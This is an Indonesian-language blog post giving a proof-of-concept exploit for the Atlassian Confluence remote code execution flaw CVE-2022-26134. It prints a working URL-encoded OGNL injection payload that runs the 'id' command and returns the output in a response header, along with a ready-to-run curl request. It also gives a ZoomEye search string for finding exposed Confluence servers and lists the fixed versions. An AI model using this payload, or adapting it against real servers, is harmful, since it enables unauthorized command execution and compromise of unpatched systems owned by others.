Atlassian Confluence Remote Code Execution

Remote Code Execution (RCE) vulnerability pada Atlassian Confluence.

CVE: CVE-2022-26134
Vendor: Atlassian
Fixed Versions: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4, 7.18.1
Zoomeye search: "<meta name=\"ajs-version-number\" content=\"version\">"
Proof of Concept:
Buat request dengan payload

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Naxtarrr-D704T%22%2C%23a%29%29%7D/

Kita mengeksekusi command id dengan membuat header X-Naxtarrr-D704T. Untuk melihat hasil dari command yang sudah dieksekusi bisa dilihat pada bagian header.

Contoh request dengan curl

curl --head --insecure "https://localhost/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Naxtarrr-D704T%22%2C%23a%29%29%7D/"

*Parameter --head untuk mendapatkan header nya saja, dan parameter --insecure untuk skip ssl verification
Bisa dilihat pada bagian X-Naxtarrr-D704T, command id sudah berhasil tereksekusi.

Muhammad Rasyad

I'm just an ordinary weeb who likes technology stuff and to learn about coding and cyber security

Posting Komentar

Lebih baru Lebih lama